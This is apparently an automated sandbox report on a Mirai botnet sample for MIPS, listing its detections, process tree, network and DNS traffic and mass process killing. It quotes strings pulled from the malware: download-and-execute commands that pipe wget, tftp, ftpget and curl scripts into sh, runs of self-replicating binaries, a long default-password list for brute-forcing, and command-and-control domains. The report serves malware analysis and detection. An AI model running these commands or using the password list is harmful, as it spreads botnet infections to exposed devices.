Edit tour

Linux Analysis Report
mips.elf

Overview

General Information

Sample name:	mips.elf
Analysis ID:	1611370
MD5:	3c8a517caf2e285e584747f21b3c90e3
SHA1:	7e795c9512d298a5f497f6a946a5a0b04ff3ffd4
SHA256:	0c4618c5f0a988c3f0205aab766a9b48d71d649e3c1a49042b1df90b949a5a5b
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai

Score:	84
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Mirai

Connects to many ports of the same IP (likely port scanning)

Sample tries to kill multiple processes (SIGKILL)

Sends malformed DNS queries

Detected TCP or UDP traffic on non-standard ports

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings indicative of password brute-forcing capabilities

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1611370
Start date and time:	2025-02-10 20:18:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	mips.elf
Detection:	MAL
Classification:	mal84.spre.troj.linELF@0/0@26/0

Warnings

VT rate limit hit for: cats-master.ru. [malformed]
VT rate limit hit for: gokittler.ru. [malformed]
VT rate limit hit for: kittler.ru. [malformed]

Runtime Messages

Command:	/tmp/mips.elf
PID:	6216
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	The Peoples Bank of China.
Standard Error:

Process Tree

system is lnxubuntu20

mips.elf (PID: 6216, Parent: 6134, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/mips.elf

mips.elf New Fork (PID: 6218, Parent: 6216)

mips.elf New Fork (PID: 6220, Parent: 6218)

mips.elf New Fork (PID: 6222, Parent: 6218)

mips.elf New Fork (PID: 6224, Parent: 6218)

gdm3 New Fork (PID: 6249, Parent: 1320)

Default (PID: 6249, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

xfce4-session New Fork (PID: 6250, Parent: 1900)

gdm3 New Fork (PID: 6254, Parent: 1320)

Default (PID: 6254, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

xfce4-session New Fork (PID: 6255, Parent: 1900)

xfce4-session New Fork (PID: 6256, Parent: 1900)

xfce4-session New Fork (PID: 6257, Parent: 1900)

xfdesktop (PID: 6257, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542

xfce4-session New Fork (PID: 6259, Parent: 1900)

xfce4-panel (PID: 6259, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec

xfce4-session New Fork (PID: 6261, Parent: 1900)

xfwm4 (PID: 6261, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c

xfce4-session New Fork (PID: 6263, Parent: 1900)

xfdesktop (PID: 6263, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542

xfce4-session New Fork (PID: 6265, Parent: 1900)

xfce4-panel (PID: 6265, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec

xfce4-session New Fork (PID: 6267, Parent: 1900)

xfwm4 (PID: 6267, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c

xfce4-session New Fork (PID: 6269, Parent: 1900)

xfdesktop (PID: 6269, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
mips.elf	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
mips.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
6216.1.00007faecc400000.00007faecc41d000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6216.1.00007faecc400000.00007faecc41d000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6222.1.00007faecc400000.00007faecc41d000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6222.1.00007faecc400000.00007faecc41d000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6220.1.00007faecc400000.00007faecc41d000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6220.1.00007faecc400000.00007faecc41d000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Click to see the 1 entries

String: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.93.89.106 ports 38241,1,2,3,4,8

Sends malformed DNS queries

Source: global traffic	DNS traffic detected: malformed DNS query: kittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: cats-master.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: polizei.su. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: kittlez.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: newkittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: kittlerer.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: gokittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: qittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: thekittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: mykittler.ru. [malformed]

Source: global traffic

TCP traffic: 192.168.2.23:39702 -> 185.93.89.106:38241

Source: /tmp/mips.elf (PID: 6216)

Socket: 127.0.0.1:39148

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 192.35.75.23
Source: unknown	TCP traffic detected without corresponding DNS query: 192.35.75.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.35.191.195
Source: unknown	TCP traffic detected without corresponding DNS query: 25.116.95.17
Source: unknown	TCP traffic detected without corresponding DNS query: 188.35.191.195
Source: unknown	TCP traffic detected without corresponding DNS query: 211.140.50.110
Source: unknown	TCP traffic detected without corresponding DNS query: 25.116.95.17
Source: unknown	TCP traffic detected without corresponding DNS query: 41.83.76.194
Source: unknown	TCP traffic detected without corresponding DNS query: 211.140.50.110
Source: unknown	TCP traffic detected without corresponding DNS query: 41.83.76.194
Source: unknown	TCP traffic detected without corresponding DNS query: 163.224.220.195
Source: unknown	TCP traffic detected without corresponding DNS query: 175.202.252.137
Source: unknown	TCP traffic detected without corresponding DNS query: 163.224.220.195
Source: unknown	TCP traffic detected without corresponding DNS query: 75.184.195.174
Source: unknown	TCP traffic detected without corresponding DNS query: 175.202.252.137
Source: unknown	TCP traffic detected without corresponding DNS query: 108.58.16.54
Source: unknown	TCP traffic detected without corresponding DNS query: 75.184.195.174
Source: unknown	TCP traffic detected without corresponding DNS query: 197.122.2.94
Source: unknown	TCP traffic detected without corresponding DNS query: 108.58.16.54
Source: unknown	TCP traffic detected without corresponding DNS query: 163.135.230.101
Source: unknown	TCP traffic detected without corresponding DNS query: 197.122.2.94
Source: unknown	TCP traffic detected without corresponding DNS query: 163.135.230.101
Source: unknown	TCP traffic detected without corresponding DNS query: 181.69.121.168
Source: unknown	TCP traffic detected without corresponding DNS query: 63.190.64.54
Source: unknown	TCP traffic detected without corresponding DNS query: 181.69.121.168
Source: unknown	TCP traffic detected without corresponding DNS query: 34.163.125.203
Source: unknown	TCP traffic detected without corresponding DNS query: 63.190.64.54
Source: unknown	TCP traffic detected without corresponding DNS query: 134.12.253.14
Source: unknown	TCP traffic detected without corresponding DNS query: 34.163.125.203
Source: unknown	TCP traffic detected without corresponding DNS query: 38.207.138.11
Source: unknown	TCP traffic detected without corresponding DNS query: 134.12.253.14
Source: unknown	TCP traffic detected without corresponding DNS query: 160.181.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 38.207.138.11
Source: unknown	TCP traffic detected without corresponding DNS query: 160.181.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 209.123.240.12
Source: unknown	TCP traffic detected without corresponding DNS query: 209.123.240.12
Source: unknown	TCP traffic detected without corresponding DNS query: 88.171.2.111
Source: unknown	TCP traffic detected without corresponding DNS query: 88.171.2.111
Source: unknown	TCP traffic detected without corresponding DNS query: 11.152.5.38
Source: unknown	TCP traffic detected without corresponding DNS query: 175.208.67.239
Source: unknown	TCP traffic detected without corresponding DNS query: 11.152.5.38
Source: unknown	TCP traffic detected without corresponding DNS query: 123.36.135.99
Source: unknown	TCP traffic detected without corresponding DNS query: 175.208.67.239
Source: unknown	TCP traffic detected without corresponding DNS query: 123.36.135.99
Source: unknown	TCP traffic detected without corresponding DNS query: 83.43.155.209
Source: unknown	TCP traffic detected without corresponding DNS query: 83.43.155.209
Source: unknown	TCP traffic detected without corresponding DNS query: 167.37.240.222
Source: unknown	TCP traffic detected without corresponding DNS query: 167.37.240.222
Source: unknown	TCP traffic detected without corresponding DNS query: 161.122.26.73

Source: global traffic	DNS traffic detected: DNS query: cat-are-here.ru
Source: global traffic	DNS traffic detected: DNS query: kittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: gokittler.ru
Source: global traffic	DNS traffic detected: DNS query: cats-master.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: polizei.su. [malformed]
Source: global traffic	DNS traffic detected: DNS query: kittlerer.ru
Source: global traffic	DNS traffic detected: DNS query: kittlez.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: newkittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: kittlerer.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: gokittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: cuttiecats.ru
Source: global traffic	DNS traffic detected: DNS query: cats-master.ru
Source: global traffic	DNS traffic detected: DNS query: qittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: thekittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: mykittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: mykittler.ru

Source: mips.elf	String found in binary or memory: http:///curl.sh
Source: mips.elf	String found in binary or memory: http:///wget.sh

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 904, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1576, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1900, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2028, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2050, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2062, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2063, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2069, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2123, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6194, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6220, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6222, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6250, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6255, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6256, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6257, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6258, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6259, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6260, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6261, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6262, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6263, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6264, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6265, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6266, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6267, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6268, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6269, result: successful	Jump to behavior

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample	String containing 'busybox' found: /wget.sh -O- \| sh;/bin/busybox tftp -g
Source: Initial sample	String containing 'busybox' found: -r tftp.sh -l- \| sh;/bin/busybox ftpget
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- \| sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne >> > .d

Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: 654321
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: admin1234
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: supervisor

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 904, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1576, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1900, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2028, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2050, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2062, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2063, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2069, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2123, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6194, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6220, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6222, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6250, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6255, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6256, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6257, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6258, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6259, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6260, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6261, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6262, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6263, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6264, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6265, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6266, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6267, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6268, result: successful	Jump to behavior
Source: /tmp/mips.elf (PID: 6224)	SIGKILL sent: pid: 6269, result: successful	Jump to behavior

Source: classification engine

Classification label: mal84.spre.troj.linELF@0/0@26/0

Source: /tmp/mips.elf (PID: 6216)

Queries kernel information via 'uname':

Jump to behavior

Source: mips.elf, 6216.1.00005608aa4fb000.00005608aa582000.rw-.sdmp, mips.elf, 6220.1.00005608aa4fb000.00005608aa582000.rw-.sdmp, mips.elf, 6222.1.00005608aa4fb000.00005608aa582000.rw-.sdmp	Binary or memory string: V!/etc/qemu-binfmt/mips
Source: mips.elf	Binary or memory string: vmware
Source: mips.elf, 6216.1.00005608aa4fb000.00005608aa582000.rw-.sdmp, mips.elf, 6220.1.00005608aa4fb000.00005608aa582000.rw-.sdmp, mips.elf, 6222.1.00005608aa4fb000.00005608aa582000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: mips.elf	Binary or memory string: @nE7jA%5mmicrobusinessPASSWORDmeinsmcms500adslnadamgiraff666666zoomadslsuperadminIs@dminikwbalpineasantepuconexantaquariotinitsunamivertex25ektks123inflectionip20anicuscADMINpermitpldtadminonexantdvr2580222Win1doW$true5432112341234JVC3500/24sitecom46ironport88888888uClinuxvolition2800tslinuxsecurityatlantis888888nCwMnJVGagbaby00000000openelec1111111kont2004rpitc123123696969362729atc456hp.comcycl3R0cks!letacla000000nosoup4u11111111Gin51mvf3mg3500merlin99999999admin1anni201322222mlusrlogin3333333adminpldtbbsd-clientchangeme2support123aerohiveadmin00vmware123utstartl789l3tm31nseiko2005tivonpw,ba23422222222admintrupt1789admdarkcusadminhighspeedascendMenarasysAdmin33333oracleanicust3333wbox123attackAscendAitbISP4eCiGadmin@mymifi2222222dPZb4GJTu9ROOMeins1988321piloucomcastsetupZmqVfoSIP333333michelangeloCOadmin123Zntslqblendervt100admin_1pfsensehellotest1my_DEMARCjvswitchezdvr7ujMko0root/ADMIN/adminlvjhadminlvjh1232010vstaxmhdpicruntop10qwertyQwestM0demqweasdzxguest123h2014071TANDBERGWprootarkeiachangemenowf00b@rarticawww9311supersurtiwkbadmintesthuigu309UsernetscreenpitaZz@23495859Root1password123fidel123annie2016asdfghdottietwe8ehomebatman123hackedwelcomeyellowD13hh[china123p@ssw0rdjordanhackmewagodasdec1patrickgforgeEminemspidermansparkypassword1shadowgatewaydiamondprincessflowerchelsearichardFootballpornsexycamarofalconwhorebigdogChongqingcuntmartin12121212bitchcheeseHustonsecretpassword123456789Metallicacowboy1999654321slipknotstarwarsCharlie1997daddyRootdragonhustonfuckmepussytrustno1cowboysfootballsmcadminsysadmvmwareprofensegamezlrkr0x123qwesuperuserIntraStackAsantecraftcrftpwfriendrootmeP@55w0rd!debugrainCisconsrootinformixmediatorqwe123db2fenc1ibmdb2forgotvideoinfobloxdb2inst1nagiosxiiclocktimelyenablediagdraytekdbadminsq!us3rglftpddiagdangerapcAlphanetworkswrgg15_di524adminHWapacheabcwebserverapache123arpwatchavinashaspbackupadminazzakhalelbackuppukcabasteriskbackupscmhealthbadservercactielliebackup1234cloudcbscbs123billsupermenbenutzerpasswortftp1234annie2013annie2015annie2012annie2014jvcepicrouter
Source: mips.elf, 6216.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmp, mips.elf, 6220.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmp, mips.elf, 6222.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mips.elf
Source: mips.elf, 6216.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmp, mips.elf, 6220.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmp, mips.elf, 6222.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: mips.elf	Binary or memory string: vmware123

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: mips.elf, type: SAMPLE
Source: Yara match	File source: 6216.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6222.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: mips.elf, type: SAMPLE
Source: Yara match	File source: 6216.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6222.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
